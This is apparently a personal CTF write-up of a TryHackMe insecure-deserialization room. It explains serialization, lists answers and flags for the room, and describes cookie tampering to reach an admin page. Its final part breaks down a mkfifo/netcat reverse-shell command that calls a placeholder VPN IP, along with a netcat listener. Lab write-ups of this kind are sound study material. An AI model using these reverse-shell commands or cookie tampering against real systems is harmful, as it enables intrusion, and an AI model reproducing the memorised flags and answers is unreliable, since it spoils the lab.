Insecure Deserialization

Date: 02, January, 2021

Author: Dhilip Sanjay S

Serialization and Deserialization

• Serialization is the process of converting objects used in programming into simpler, compatible formatting for transmitting between systems or networks.

• Deserialization is the process of converting serialized information into their complex form - an object that the application will be able to understand.

Insecure Deserialization

• Insecure Deserialization is a vulnerability which occurs when untrusted data is used to abuse the logic of an application

• It involves sreplacing data processed by an application with malicious code - allowing DoS to RCE.

• Low exploitability - attacker needs to have a good understanding of the inner-workings of the application.

• The exploit is only as dangerous as the attacker's skill permits.

What's vulnerable?

• Any application that stores or fetches data where there are no validations or integrity checks in place for the data queried or retained.

• Few examples of applications:

  • E-commerce Sites

  • Forums

  • API's

  • Application Runtimes (Tomcat, Jenkins, Jboss, etc)

Insecure Deserialization - Objects

• In OOP, objects are made up of two things:

  • State

  • Behaviour

Insecure Deserialization - cookies

• Cookies are tiny peices of data - created and stored by website on the user's computer.

• Cookies store login information like sessionId.

• Attributes of cookies:

Solutions

Who developed the Tomcat application?

• Answer: The Apache Software Foundation

• Initially I thought, James Duncan Davidson. But they actually wanted the organization's name.

What type of attack that crashes services can be performed with insecure deserialization?

• Answer: Denial of Service

If a dog was sleeping, would this be:

• Answer: Behaviour

• Note:

  • Sleep - State

  • Sleeping - behaviour

What is the name of the base-2 formatting that data is sent across a network as?

• Answer: Binary

If a cookie had the path of webapp.com/login , what would the URL that the user has to visit be?

• Answer: webapp.com/login

What is the acronym for the web technology that Secure cookies work over?

• Answer: HTTPS

1st flag (cookie value)

• Answer: THM{good_old_base64_huh}

• Steps to Reproduce:

2nd flag (admin dashboard)

• Answer: THM{heres_the_admin_flag}

• Steps to Reproduce: Change the userType field value to admin in the cookie and reload the page.

What is the value in flag.txt?

• Answer: 4a69a7ff9fd68

• Steps to Reproduce:

  • Submit a feedback.

  • You'll have a cookie named encodedPayload.

  • Replace the value with the one you get from running rce.py.

  Explanation of the code:

  • rm /tmp/f - removes the file if it exists.

  • mkfifo /tmp/f - creates a named IO pipe.

  • cat /tmp/f | /bin/sh -i 2>&1 - contents of the named pipe is printed and piped into /bin/sh.

  • netcat YOUR_TRYHACKME_VPN_IP 1234 > /tmp/f

    • The output of the commands executed by /bin/sh is directed into stdin of nc.

    • The output of nc (commands coming over the network) is redirected to the FIFO.

  • Listen using netcat: nc -lvnp 1234

  • Reload the page.

  • You will get a reverse shell: